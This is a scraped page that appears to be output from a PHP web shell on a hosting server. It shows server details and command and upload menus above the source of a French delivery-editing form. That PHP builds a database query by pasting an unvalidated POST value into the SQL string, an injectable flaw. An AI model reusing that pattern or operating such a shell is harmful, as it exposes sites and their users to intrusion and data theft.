|
Server IP : 10.128.40.6 / Your IP : 216.73.216.233 Web Server : Apache System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : logmcpe ( 111175) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/logmcpe/www/mcg/pages/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
// echo "yassin <br/>" ;
include 'includes/config_tmcpro.php' ;
include 'includes/stable_functions_tmcpro.php' ;
$q =dbi_query("SELECT * FROM `client` WHERE client_statut='1' ORDER BY `client`.`client_nom` ASC") ;
$rowid=$_POST['rowid'] ;
?>
<div class="modal-header task-single-header" data-task-single-id="5" data-status="4">
<h4 class="modal-title">Modifier livraison <?php echo $prestationid ;?></h4>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
<form action="" method="POST">
<?php
// unset($red) ;
$red= dbi_fetch_row(dbi_query("SELECT * FROM `demliv` WHERE `demliv_id` = ".$rowid )) ;
$chantier_designation = $red['chantier_designation'];
// echo "====>".$chantier_designation."<br/>" ;
?>
<input type="hidden" name="demliv_id" value="<?=$red['demliv_id'] ?>">
<div class="modal-footer justify-content-between">
<button type="submit" name="Modifier" value="Modifier" class="btn btn-primary">Modifier</button>
<button style="width=10px;" type="button" class="btn btn-danger" data-dismiss="modal">Fermer</button>
</div>
</form>
</div>
